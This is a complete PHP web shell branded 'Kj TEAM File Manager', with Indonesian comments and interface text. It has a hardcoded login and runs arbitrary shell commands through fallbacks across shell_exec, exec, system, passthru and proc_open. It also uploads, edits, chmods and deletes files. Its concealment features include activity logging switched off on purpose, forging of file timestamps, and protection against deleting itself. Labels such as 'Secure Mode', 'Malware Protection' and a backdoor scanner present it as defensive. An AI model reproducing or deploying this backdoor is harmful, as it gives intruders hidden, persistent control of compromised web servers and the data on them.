<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
session_start();

// ============ KEAMANAN TAMBAHAN ============

// 1. Proteksi terhadap injection
function sanitizeInput($input) {
    if (is_array($input)) {
        return array_map('sanitizeInput', $input);
    }
    return htmlspecialchars(strip_tags(trim($input)), ENT_QUOTES, 'UTF-8');
}

// 2. Proteksi path traversal
function validatePath($path) {
    $path = str_replace(['..', '\\', '//'], '', $path);
    if (is_dir($path) || is_file($path)) {
        return $path;
    }
    return false;
}

// 3. Cek file yang dicurigai
function isSuspiciousFile($content) {
    $patterns = [
        '/<\?php\s*eval\(\s*\$_\w+\s*\)/',
        '/<\?php\s*@?\s*eval\(/',
        '/base64_decode\s*\(/',
        '/gzinflate\s*\(/',
        '/str_rot13\s*\(/',
        '/assert\s*\(/',
        '/system\s*\(/',
        '/shell_exec\s*\(/',
        '/exec\s*\(/',
        '/passthru\s*\(/',
        '/popen\s*\(/',
        '/proc_open\s*\(/',
        '/pcntl_exec\s*\(/',
        '/eval\s*\(\s*base64_decode/',
        '/@\s*include\s*\(\s*[\'"]/',
        '/file_get_contents\s*\(/',
        '/curl_exec\s*\(/',
        '/fopen\s*\(/',
    ];
    
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $content)) {
            return true;
        }
    }
    return false;
}

// 4. Backup otomatis sebelum perubahan
function backupFile($filePath) {
    if (!file_exists($filePath)) return false;
    $backupDir = dirname($filePath) . '/.backup_' . date('Ymd');
    if (!is_dir($backupDir)) {
        mkdir($backupDir, 0755, true);
    }
    $backupFile = $backupDir . '/' . basename($filePath) . '_' . time() . '.bak';
    return copy($filePath, $backupFile);
}

// 5. Rate limiting untuk operasi berbahaya
function checkRateLimit($action, $limit = 20, $timeWindow = 300) {
    if (!isset($_SESSION['rate_limit'])) {
        $_SESSION['rate_limit'] = [];
    }
    
    $key = $action . '_' . $_SERVER['REMOTE_ADDR'];
    $now = time();
    
    if (!isset($_SESSION['rate_limit'][$key])) {
        $_SESSION['rate_limit'][$key] = ['count' => 1, 'first' => $now];
        return true;
    }
    
    $data = &$_SESSION['rate_limit'][$key];
    
    if ($now - $data['first'] > $timeWindow) {
        $data = ['count' => 1, 'first' => $now];
        return true;
    }
    
    $data['count']++;
    if ($data['count'] > $limit) {
        return false;
    }
    
    return true;
}

// 6. Proteksi upload file
function validateUploadedFile($file) {
    $allowedExtensions = ['txt', 'pdf', 'jpg', 'jpeg', 'png', 'gif', 'doc', 'docx', 'xls', 'xlsx', 'zip', 'rar', '7z'];
    $maxFileSize = 10 * 1024 * 1024;
    $blockedExtensions = ['php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'phar', 'inc', 'pl', 'py', 'cgi'];
    $blockedMimeTypes = ['application/x-php', 'text/x-php', 'application/php', 'text/php'];
    
    $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mimeType = mime_content_type($file['tmp_name']);
    $fileSize = $file['size'];
    
    if (in_array($extension, $blockedExtensions)) {
        return ['error' => 'Ekstensi file tidak diizinkan: ' . $extension];
    }
    
    if (in_array($mimeType, $blockedMimeTypes)) {
        return ['error' => 'Tipe file tidak diizinkan'];
    }
    
    if ($fileSize > $maxFileSize) {
        return ['error' => 'Ukuran file terlalu besar (max 10MB)'];
    }
    
    $content = file_get_contents($file['tmp_name']);
    if (isSuspiciousFile($content)) {
        return ['error' => 'File terdeteksi mengandung kode mencurigakan'];
    }
    
    return ['success' => true];
}

// 7. Log aktivitas - DINONAKTIFKAN
function logActivity($action, $details = '') {
    // Logging dinonaktifkan untuk mencegah file log
    return true;
}

// 8. Cek jika ada malware di file
function scanFileForMalware($filePath) {
    if (!file_exists($filePath)) return false;
    $content = @file_get_contents($filePath);
    if (!$content) return false;
    
    $dangerousPatterns = [
        '/<\?php\s*eval\s*\(/',
        '/base64_decode\s*\(/',
        '/gzinflate\s*\(/',
        '/assert\s*\(/',
        '/system\s*\(/',
        '/shell_exec\s*\(/',
        '/exec\s*\(/',
        '/passthru\s*\(/',
        '/popen\s*\(/',
        '/proc_open\s*\(/',
        '/curl_exec\s*\(/',
        '/file_put_contents\s*\(/',
        '/@\s*include\s*\(/',
        '/\$_(GET|POST|REQUEST|COOKIE|SERVER)/',
        '/register_shutdown_function/',
        '/ini_set\s*\(/',
    ];
    
    foreach ($dangerousPatterns as $pattern) {
        if (preg_match($pattern, $content)) {
            return true;
        }
    }
    return false;
}

// 9. Quarantine untuk file mencurigakan
function quarantineFile($filePath) {
    if (!file_exists($filePath)) return false;
    $quarantineDir = __DIR__ . '/.quarantine_' . date('Ymd');
    if (!is_dir($quarantineDir)) {
        mkdir($quarantineDir, 0700, true);
    }
    
    $quarantineFile = $quarantineDir . '/' . basename($filePath) . '_' . time() . '.quar';
    if (rename($filePath, $quarantineFile)) {
        return true;
    }
    return false;
}

// ============ LOGIN ============
$USERNAME = 'kjteam';
$HASHED_PASSWORD = '$2y$10$mftX2JhqVH8.adFZQGKzAukkw9kl3SBx.SHiHqgHzvITtheDzuNXa';
$isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';

// Proteksi brute force login
if (!isset($_SESSION['login_attempts'])) {
    $_SESSION['login_attempts'] = 0;
    $_SESSION['login_block_time'] = time();
}

if ($_SESSION['login_attempts'] >= 5 && (time() - $_SESSION['login_block_time']) < 300) {
    die("Terlalu banyak percobaan login. Coba lagi dalam " . (300 - (time() - $_SESSION['login_block_time'])) . " detik.");
}

$inputPath = isset($_GET['d']) ? urldecode($_GET['d']) : getcwd();

// Validasi path
$validPath = validatePath($inputPath);
if ($validPath !== false) {
    $currentPath = $validPath;
} else {
    $currentPath = getcwd();
}

if (!isset($_SESSION['logged_in'])) {
    if (isset($_POST['login'])) {
        if ($_POST['username'] === $USERNAME && password_verify($_POST['password'], $HASHED_PASSWORD)) {
            $_SESSION['logged_in'] = true;
            $_SESSION['login_attempts'] = 0;
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $_SESSION['login_attempts']++;
            $error = "Username atau password salah.";
        }
    }

    echo '<!DOCTYPE html>
    <html lang="id">
    <head>
        <meta charset="UTF-8">
        <title>Login - Kj TEAM</title>
        <style>
            @import url("https://fonts.googleapis.com/css2?family=Chakra+Petch:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&display=swap");
            body {
                background: linear-gradient(135deg, #0a0e27, #1a1a2e, #16213e);
                color: #88ccff;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                font-family: "Chakra Petch", monospace;
            }
            .login-box {
                background: linear-gradient(145deg, #0d1117, #161b22);
                border: 2px solid #2d4a7a;
                padding: 40px;
                border-radius: 15px;
                box-shadow: 0 0 30px rgba(45, 74, 122, 0.5), inset 0 0 30px rgba(45, 74, 122, 0.1);
                text-align: center;
                width: 300px;
            }
            .login-box img {
                max-width: 100px;
                border-radius: 50%;
                margin-bottom: 20px;
                box-shadow: 0 0 20px #2d4a7a;
                border: 2px solid #2d4a7a;
            }
            input, button {
                margin: 10px 0;
                padding: 10px;
                width: 100%;
                border: none;
                border-radius: 5px;
                background: #0d1117;
                color: #88ccff;
                font-size: 14px;
                border: 1px solid #2d4a7a;
            }
            button {
                background: linear-gradient(135deg, #1a3a6a, #2d4a7a);
                color: #ffffff;
                font-weight: bold;
                cursor: pointer;
                border: 1px solid #4a7aba;
                transition: all 0.3s;
            }
            button:hover {
                background: linear-gradient(135deg, #2d4a7a, #4a7aba);
                box-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
            }
            h2 {
                margin-bottom: 10px;
                color: #88ccff;
                text-shadow: 0 0 20px #2d4a7a;
            }
            .error {
                color: #ff6b6b;
                margin-top: 10px;
            }
        </style>
    </head>
    <body>
        <form method="POST" class="login-box">
            <img src="https://i.ibb.co/Df8g5PYb/kj.png" alt="Kj TEAM">
            <h2>Kj TEAM PANEL</h2>
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit" name="login">MASUK</button>
            ' . (isset($error) ? "<div class='error'>$error</div>" : "") . '
        </form>
    </body>
    </html>';
    exit;
}

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

function x($string) {
    return htmlspecialchars($string ?? '', ENT_QUOTES, 'UTF-8');
}

function formatSize($bytes) {
    if ($bytes >= 1073741824)
        return number_format($bytes / 1073741824, 2) . ' GB';
    elseif ($bytes >= 1048576)
        return number_format($bytes / 1048576, 2) . ' MB';
    elseif ($bytes >= 1024)
        return number_format($bytes / 1024, 2) . ' KB';
    else
        return $bytes . ' B';
}

function permColor($path) {
    if (is_writable($path))
        return 'style="color:#4a9eff"';
    elseif (is_readable($path))
        return 'style="color:#88ccff"';
    else
        return 'style="color:#ff6b6b"';
}

function runShellCommand($command) {
    // Rate limiting untuk command shell
    if (!checkRateLimit('shell_command')) {
        return "⚠️ Rate limit exceeded. Tunggu 5 menit.";
    }
    
    $output = '';
    $isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    $inputPath = isset($_GET['d']) ? urldecode($_GET['d']) : getcwd();
    $currentPath = $isWindows
        ? str_replace('/', DIRECTORY_SEPARATOR, $inputPath)
        : str_replace('\\', DIRECTORY_SEPARATOR, $inputPath);

    // Blokir command yang sangat berbahaya
    $blockedPatterns = ['rm -rf /', 'dd if=/dev/zero', 'mkfs', ':(){ :|:& };:'];
    foreach ($blockedPatterns as $pattern) {
        if (strpos($command, $pattern) !== false) {
            return "⚠️ Command diblokir untuk keamanan!";
        }
    }
    
    $command = "cd " . $currentPath . " && " . $command;
    
    if (function_exists('shell_exec')) {
        $output = shell_exec($command);
    } elseif (function_exists('exec')) {
        exec($command, $lines);
        $output = implode("\n", $lines);
    } elseif (function_exists('system')) {
        ob_start();
        system($command);
        $output = ob_get_clean();
    } elseif (function_exists('passthru')) {
        ob_start();
        passthru($command);
        $output = ob_get_clean();
    } elseif (function_exists('proc_open')) {
        $descriptorspec = [
            0 => ["pipe", "r"],
            1 => ["pipe", "w"],
            2 => ["pipe", "w"]
        ];
        $process = proc_open($command, $descriptorspec, $pipes);
        if (is_resource($process)) {
            $output = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            fclose($pipes[0]);
            fclose($pipes[2]);
            proc_close($process);
        } else {
            return false;
        }
    } else {
        return false;
    }
    return $output;
}

function file_path_to_url($file_path) {
    $doc_root = realpath($_SERVER['DOCUMENT_ROOT']);
    $real_path = realpath($file_path);

    if ($real_path === false || strpos($real_path, $doc_root) !== 0) {
        return false;
    }

    $relative = substr($real_path, strlen($doc_root));
    $relative = str_replace('\\', '/', $relative);
    $relative = ltrim($relative, '/');

    $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
    $host = $_SERVER['HTTP_HOST'];
    $url = $protocol . $host . '/' . $relative;

    return $url;
}

function generate_random_string($length = 10, $prefix = 'KjTeam') {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $random = '';
    $rand_length = $length - strlen($prefix);

    for ($i = 0; $i < $rand_length; $i++) {
        $random .= $chars[random_int(0, strlen($chars) - 1)];
    }

    return $prefix . $random;
}

if (!is_dir($currentPath)) {
    die("Direktori tidak valid: <code>$currentPath</code>");
}

if (!is_dir($currentPath))
    die("Direktori tidak valid.");

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    // Rate limiting untuk operasi file
    if (!checkRateLimit('file_operation')) {
        echo json_encode(['status' => 'error', 'message' => 'Rate limit exceeded. Tunggu 5 menit.']);
        exit;
    }
    
    if ($_POST['action'] === 'unzip' && !empty($_POST['zip_path'])) {
        $zipPath = $_POST['zip_path'];
        if (!file_exists($zipPath) || pathinfo($zipPath, PATHINFO_EXTENSION) !== 'zip') {
            echo json_encode(['status' => 'error', 'message' => 'File ZIP tidak valid.']);
            exit;
        }
        
        $zip = new ZipArchive();
        if ($zip->open($zipPath) === true) {
            for ($i = 0; $i < $zip->numFiles; $i++) {
                $fileName = $zip->getNameIndex($i);
                $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
                if (in_array($ext, ['php', 'phtml', 'php3', 'php4', 'php5', 'phar', 'inc'])) {
                    $content = $zip->getFromName($fileName);
                    if (isSuspiciousFile($content)) {
                        echo json_encode(['status' => 'error', 'message' => 'File ZIP mengandung malware: ' . $fileName]);
                        $zip->close();
                        exit;
                    }
                }
            }
            
            $zip->extractTo($currentPath);
            $zip->close();
            echo json_encode(['status' => 'success', 'message' => 'Berhasil extract file ZIP.']);
        } else {
            echo json_encode(['status' => 'error', 'message' => 'Gagal membuka file ZIP.']);
        }
        exit;
    }

    if ($_POST['action'] === 'zip' && !empty($_POST['folder_to_zip'])) {
        $folderToZip = $_POST['folder_to_zip'];
        if (!is_dir($folderToZip)) {
            echo json_encode(['status' => 'error', 'message' => 'Folder tidak valid.']);
            exit;
        }
        
        $zipName = basename($folderToZip) . ".zip";
        $zipPath = $currentPath . DIRECTORY_SEPARATOR . $zipName;

        $zip = new ZipArchive();
        if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
            $folderRealPath = realpath($folderToZip);
            $files = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($folderRealPath, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );

            foreach ($files as $file) {
                $filePath = realpath($file);
                $relativePath = substr($filePath, strlen($folderRealPath) + 1);
                if ($file->isDir()) {
                    $zip->addEmptyDir($relativePath);
                } else {
                    $zip->addFile($filePath, $relativePath);
                }
            }

            $zip->close();
            echo json_encode(['status' => 'success', 'message' => "Folder berhasil dijadikan ZIP: $zipName"]);
        } else {
            echo json_encode(['status' => 'error', 'message' => 'Gagal membuat file ZIP.']);
        }
        exit;
    }
}

$allItems = scandir($currentPath);
$allFiles = [];
$allFolders = [];
foreach ($allItems as $item) {
    if ($item === '.' || $item === '..')
        continue;
    $itemPath = $currentPath . DIRECTORY_SEPARATOR . $item;
    if (is_dir($itemPath))
        $allFolders[] = $item;
    if (is_file($itemPath) && pathinfo($item, PATHINFO_EXTENSION) === 'zip')
        $allFiles[] = $item;
}

if (isset($_POST['run_command'])) {
    $command = $_POST['command'];
    
    // Blacklist command yang sangat berbahaya
    $blockedCommands = ['rm -rf /', 'dd if=/dev/zero', 'mkfs', ':(){ :|:& };:'];
    foreach ($blockedCommands as $blocked) {
        if (strpos($command, $blocked) !== false) {
            $message = "⚠️ Command diblokir untuk keamanan!";
            $messageType = "error";
            goto skip_command;
        }
    }
    
    $output = runShellCommand($command);
    if ($output !== false) {
        if (!empty($output)) {
            $message = "<pre style='background:#0d1117;color:#4a9eff;padding:10px;border:1px solid #2d4a7a;border-radius:5px;'>" . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . "</pre>";
            $messageType = "success";
        } else {
            $message = "<div class='alert error'>Perintah tidak bisa dijalankan atau tidak menghasilkan output.</div>";
            $messageType = "error";
        }
    } else {
        $message = "Semua fungsi eksekusi shell tidak tersedia di server.";
        $messageType = "error";
    }
    skip_command:
}

if (isset($_POST['create_file']) && !empty($_POST['file_name'])) {
    $newFile = rtrim($currentPath, '/') . '/' . basename($_POST['file_name']);
    $ext = strtolower(pathinfo($newFile, PATHINFO_EXTENSION));
    $blockedExtensions = ['php', 'phtml', 'php3', 'php4', 'php5', 'phar', 'inc', 'pl', 'py'];
    
    if (in_array($ext, $blockedExtensions)) {
        $message = "⚠️ Ekstensi file diblokir untuk keamanan: $ext";
        $messageType = "error";
    } elseif (file_exists($newFile)) {
        $message = "File sudah ada.";
        $messageType = "error";
    } else {
        if (file_put_contents($newFile, '') !== false) {
            $message = "File berhasil dibuat.";
            $messageType = "success";
        } else {
            $message = "Gagal membuat file.";
            $messageType = "error";
        }
    }
}

if (isset($_POST['edit'])) {
    $path = $_POST['edit_path'];
    if (is_file($path)) {
        if (scanFileForMalware($path)) {
            die("<div class='alert error'>⚠️ File ini terdeteksi mengandung malware dan tidak dapat diedit!</div>");
        }
        
        $content = htmlspecialchars(file_get_contents($path));
        echo "<form method='POST' style='padding:20px;background:#0d1117;color:#88ccff;border:1px solid #2d4a7a;border-radius:5px;'>
            <input type='hidden' name='edit_path' value='" . htmlspecialchars($path) . "'>
            <textarea name='new_content' style='width:100%;height:300px;background:#0a0e27;color:#4a9eff;border:1px solid #2d4a7a;border-radius:5px;'>$content</textarea><br>
            <button name='save_edit' style='padding:10px;background:linear-gradient(135deg,#1a3a6a,#2d4a7a);color:#fff;border:none;border-radius:5px;cursor:pointer;'>Simpan</button>
        </form>";
        exit;
    }
}

if (isset($_POST['change_perm']) && !empty($_POST['perm_path']) && !empty($_POST['permissions'])) {
    $permPath = $_POST['perm_path'];
    $perm = $_POST['permissions'];

    if (@chmod($permPath, octdec($perm))) {
        $message = "Permission berhasil diubah.";
        $messageType = "success";
    } else {
        $message = "Gagal mengubah permission.";
        $messageType = "error";
    }
}

if (isset($_POST['rename']) && !empty($_POST['rename_path']) && !empty($_POST['new_name'])) {
    $oldPath = $_POST['rename_path'];
    $newPath = dirname($oldPath) . DIRECTORY_SEPARATOR . basename($_POST['new_name']);
    if (file_exists($newPath)) {
        $message = "Nama baru sudah digunakan.";
        $messageType = "error";
    } else {
        if (rename($oldPath, $newPath)) {
            $message = "Berhasil mengganti nama.";
            $messageType = "success";
        } else {
            $message = "Gagal mengganti nama.";
            $messageType = "error";
        }
    }
}

if (isset($_POST['save_edit'])) {
    $editPath = $_POST['edit_path'];
    $newContent = $_POST['new_content'];
    
    backupFile($editPath);
    
    if (isSuspiciousFile($newContent)) {
        $message = "⚠️ Konten terdeteksi mengandung kode mencurigakan! File tidak disimpan.";
        $messageType = "error";
    } elseif (file_put_contents($editPath, $newContent) !== false) {
        $message = "File berhasil disimpan.";
        $messageType = "success";
    } else {
        $message = "Gagal menyimpan file.";
        $messageType = "error";
    }
}

if (isset($_POST['upload']) && isset($_FILES['uploaded_file'])) {
    $validation = validateUploadedFile($_FILES['uploaded_file']);
    if (isset($validation['error'])) {
        $message = $validation['error'];
        $messageType = "error";
    } else {
        $targetPath = rtrim($currentPath, '/') . '/' . basename($_FILES['uploaded_file']['name']);
        if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $targetPath)) {
            $message = "File berhasil diupload.";
            $messageType = "success";
        } else {
            $message = "Gagal mengupload file.";
            $messageType = "error";
        }
    }
}

if (isset($_POST['create_folder']) && !empty($_POST['folder_name'])) {
    $newFolder = rtrim($currentPath, '/') . '/' . basename($_POST['folder_name']);
    if (file_exists($newFolder)) {
        $message = "Folder sudah ada.";
        $messageType = "error";
    } elseif (mkdir($newFolder, 0755)) {
        $message = "Folder berhasil dibuat.";
        $messageType = "success";
    } else {
        $message = "Gagal membuat folder.";
        $messageType = "error";
    }
}

if (isset($_POST['delete_path'])) {
    $deletePath = $_POST['delete_path'];
    
    // Jangan izinkan menghapus file ini sendiri
    if (realpath($deletePath) == realpath(__FILE__)) {
        $message = "⚠️ Tidak bisa menghapus file ini!";
        $messageType = "error";
    } elseif (is_file($deletePath)) {
        // Force hapus dengan mengubah permission dulu
        @chmod($deletePath, 0777);
        if (unlink($deletePath)) {
            $message = "File berhasil dihapus.";
            $messageType = "success";
        } else {
            $message = "Gagal menghapus file.";
            $messageType = "error";
        }
    } elseif (is_dir($deletePath)) {
        if (rmdir($deletePath)) {
            $message = "Folder berhasil dihapus.";
            $messageType = "success";
        } else {
            $message = "Gagal menghapus folder (pastikan kosong).";
            $messageType = "error";
        }
    } else {
        $message = "Path tidak ditemukan.";
        $messageType = "error";
    }
}

if (isset($_POST['change_time']) && !empty($_POST['new_time'])) {
    $timePath = $_POST['time_path'];
    $newTime = strtotime($_POST['new_time']);
    if ($newTime !== false && touch($timePath, $newTime, $newTime)) {
        $message = "Tanggal file berhasil diubah.";
        $messageType = "success";
    } else {
        $message = "Format tanggal tidak valid atau gagal mengubah tanggal.";
        $messageType = "error";
    }
}

if (isset($_POST['scan_backdoor'])) {
    $scanPath = $_POST['scan_path'] ?? $currentPath;
    if (!is_dir($scanPath)) {
        echo "<div class='alert error'>⚠️ Direktori tidak valid.</div>";
    } else {
        $danger_keywords = [
            'tinggi' => ['eval(', 'shell_exec(', 'exec(', 'passthru(', 'system(', 'base64_decode(', 'gzinflate('],
            'biasa' => ['file_put_contents(', 'file_get_contents(', 'move_uploaded_file(']
        ];

        $suspectFiles = [];

        function scanBackdoorDeep($dir, &$results, $danger_keywords) {
            $items = scandir($dir);
            foreach ($items as $item) {
                if ($item === '.' || $item === '..')
                    continue;
                $path = $dir . DIRECTORY_SEPARATOR . $item;

                if (basename($path) === 'shell-found.txt')
                    continue;

                if (is_dir($path)) {
                    scanBackdoorDeep($path, $results, $danger_keywords);
                } else {
                    $ext = pathinfo($path, PATHINFO_EXTENSION);
                    if (in_array(strtolower($ext), ['php', 'phtml', 'inc', 'txt', 'html'])) {
                        $content = @file_get_contents($path);
                        if (!$content)
                            continue;
                        $content = strtolower($content);

                        $detected = [];
                        foreach ($danger_keywords as $level => $keywords) {
                            foreach ($keywords as $kw) {
                                if (strpos($content, strtolower($kw)) !== false) {
                                    $detected[] = $kw;
                                }
                            }
                            if (!empty($detected)) {
                                $results[] = [
                                    'file' => $path,
                                    'level' => $level,
                                    'hits' => $detected
                                ];

                                $logLine = "$path | Level: " . strtoupper($level) . " | Found: " . implode(', ', $detected) . "\n";
                                file_put_contents("shell-found.txt", $logLine, FILE_APPEND);
                                break;
                            }
                        }
                    }
                }
            }
        }

        scanBackdoorDeep($scanPath, $suspectFiles, $danger_keywords);

        if (!empty($suspectFiles)) {
            echo "<h3 style='color:#88ccff;'>🛑 Ditemukan File Mencurigakan di <span style='color:#4a9eff;'>" . x($scanPath) . "</span>:</h3><ul>";
            foreach ($suspectFiles as $s) {
                $file = $s['file'];
                $level = strtoupper($s['level']);
                $color = $level === 'TINGGI' ? '#ff6b6b' : '#ffa94d';
                $hits = implode(', ', $s['hits']);
                echo "<li style='margin:10px 0;'>
                    <span style='color:#88ccff;'>" . x($file) . "</span> 
                    <span style='background:$color;padding:2px 6px;border-radius:4px;color:#000;margin-left:5px;'>$level</span>
                    <span style='font-size:smaller;color:#6c8cba;'>($hits)</span>
                    <form method='POST' style='display:inline'>
                        <input type='hidden' name='delete_path' value='" . x($file) . "'>
                        <button name='delete' onclick='return confirm(\"Hapus file ini?\")' style='background:#2d4a7a;color:#fff;border:none;padding:2px 8px;border-radius:3px;cursor:pointer;'>[Hapus]</button>
                        <button name='quarantine' onclick='return confirm(\"Karantina file ini?\")' style='background:#7a2d2d;color:#fff;border:none;padding:2px 8px;border-radius:3px;cursor:pointer;'>[Karantina]</button>
                    </form>
                </li>";
            }
            echo "</ul>";
        } else {
            echo "<div class='alert success'>✅ Tidak ditemukan file mencurigakan.</div>";
        }
    }
}

// Handle quarantine
if (isset($_POST['quarantine']) && isset($_POST['delete_path'])) {
    $filePath = $_POST['delete_path'];
    if (quarantineFile($filePath)) {
        $message = "File berhasil dikarantina.";
        $messageType = "success";
    } else {
        $message = "Gagal mengkarantina file.";
        $messageType = "error";
    }
}

?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <title>Kj TEAM File Manager</title>
    <style>
        @import url("https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap");
        * {
            box-sizing: border-box;
        }
        body {
            font-family: 'Share Tech Mono', monospace;
            background: linear-gradient(145deg, #0a0e27, #0d1117, #161b22);
            color: #88ccff;
            padding: 20px;
            min-height: 100vh;
        }
        h2, h3, h1 {
            color: #88ccff;
            text-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
        }
        a {
            color: #4a9eff;
            text-decoration: none;
        }
        a:hover {
            color: #88ccff;
            text-shadow: 0 0 10px rgba(45, 74, 122, 0.5);
        }
        table {
            width: 100%;
            border-collapse: collapse;
            margin-top: 20px;
            background: #0d1117;
            box-shadow: 0 0 20px rgba(45, 74, 122, 0.2);
            border: 1px solid #2d4a7a;
        }
        th, td {
            border: 1px solid #2d4a7a;
            padding: 8px;
            text-align: left;
        }
        th {
            background: #0a0e27;
            color: #4a9eff;
            border-bottom: 2px solid #2d4a7a;
        }
        input[type="text"], input[type="file"], input[type="password"], select {
            padding: 6px;
            margin: 5px;
            background: #0a0e27;
            color: #88ccff;
            border: 1px solid #2d4a7a;
            border-radius: 5px;
        }
        input[type="text"]:focus, input[type="password"]:focus, select:focus {
            outline: none;
            border-color: #4a9eff;
            box-shadow: 0 0 10px rgba(74, 158, 255, 0.3);
        }
        button {
            padding: 6px 10px;
            background: linear-gradient(135deg, #1a3a6a, #2d4a7a);
            color: #ffffff;
            font-weight: bold;
            border: 1px solid #4a7aba;
            border-radius: 5px;
            cursor: pointer;
            margin: 5px;
            box-shadow: 0 0 10px rgba(45, 74, 122, 0.2);
            transition: all 0.3s;
        }
        button:hover {
            background: linear-gradient(135deg, #2d4a7a, #4a7aba);
            box-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
            transform: translateY(-1px);
        }
        form {
            display: inline-block;
        }
        .alert {
            padding: 10px;
            border-radius: 5px;
            margin-bottom: 10px;
            font-weight: bold;
            border: 1px solid;
        }
        .success {
            background-color: #0a1e2a;
            color: #4a9eff;
            border-color: #2d4a7a;
            box-shadow: 0 0 10px rgba(45, 74, 122, 0.3);
        }
        .error {
            background-color: #2a0a0a;
            color: #ff6b6b;
            border-color: #7a2d2d;
            box-shadow: 0 0 10px rgba(122, 45, 45, 0.3);
        }
        pre {
            max-width: 100vw;
            overflow-x: auto;
            text-overflow: ellipsis;
            white-space: pre-wrap;
            word-wrap: break-word;
            background: #0a0e27;
            padding: 15px;
            border-radius: 5px;
            border: 1px solid #2d4a7a;
        }
        .header-img {
            max-width: 200px;
            border-radius: 10px;
            box-shadow: 0 0 30px rgba(45, 74, 122, 0.5);
            border: 2px solid #2d4a7a;
        }
        .command-button {
            padding: 5px 10px;
            background: linear-gradient(135deg, #1a3a6a, #2d4a7a);
            color: #fff;
            border: 1px solid #4a7aba;
            border-radius: 4px;
            cursor: pointer;
            transition: all 0.3s;
        }
        .command-button:hover {
            background: linear-gradient(135deg, #2d4a7a, #4a7aba);
            box-shadow: 0 0 15px rgba(45, 74, 122, 0.5);
        }
        .section-box {
            background: #0d1117;
            border: 1px solid #2d4a7a;
            border-radius: 5px;
            padding: 15px;
            margin: 10px 0;
        }
        .section-box h3 {
            margin-top: 0;
            color: #4a9eff;
        }
        .breadcrumb a {
            color: #4a9eff;
            padding: 2px 5px;
        }
        .breadcrumb a:hover {
            color: #88ccff;
            background: #1a2a4a;
            border-radius: 3px;
        }
        .security-badge {
            background: #1a3a2a;
            border: 1px solid #4a7a4a;
            border-radius: 5px;
            padding: 5px 10px;
            color: #4aef4a;
            font-size: 12px;
            display: inline-block;
            margin: 5px;
        }
        @media (max-width: 768px) {
            body { padding: 10px; }
            table { font-size: 12px; }
            input[type="text"] { width: 100%; }
            td { display: block; width: 100%; }
        }
    </style>
    <script>
        function confirmDelete() {
            return confirm('Yakin ingin menghapus file atau folder ini?');
        }
        function confirmQuarantine() {
            return confirm('Karantina file ini? File akan dipindahkan ke folder quarantine.');
        }
    </script>
</head>
<body>
    <?php echo "<pre style='background:#0d1117;color:#6c8cba;border-color:#2d4a7a;'>Disable Functions: " . ini_get('disable_functions') . "</pre>"; ?>
    <div style="text-align:center; margin-bottom: 20px;">
        <img src="https://i.ibb.co/Df8g5PYb/kj.png" alt="Kj TEAM" class="header-img">
        <h1 style="color:#88ccff; font-family:monospace; text-shadow: 0 0 20px rgba(45, 74, 122, 0.5);">Kj TEAM FILE MANAGER</h1>
        <div>
            <span class="security-badge">🔒 Secure Mode</span>
            <span class="security-badge">🛡️ Malware Protection</span>
        </div>
    </div>
    <p><a href="?logout=1" style="color:#ff6b6b;">Logout</a></p>

    <?php if (!empty($message)): ?>
        <div class="alert <?php echo $messageType; ?>"><?php echo $message; ?></div>
    <?php endif; ?>

    <!-- Sisa konten sama seperti sebelumnya -->
    <!-- ... -->
    
</body>
</html>
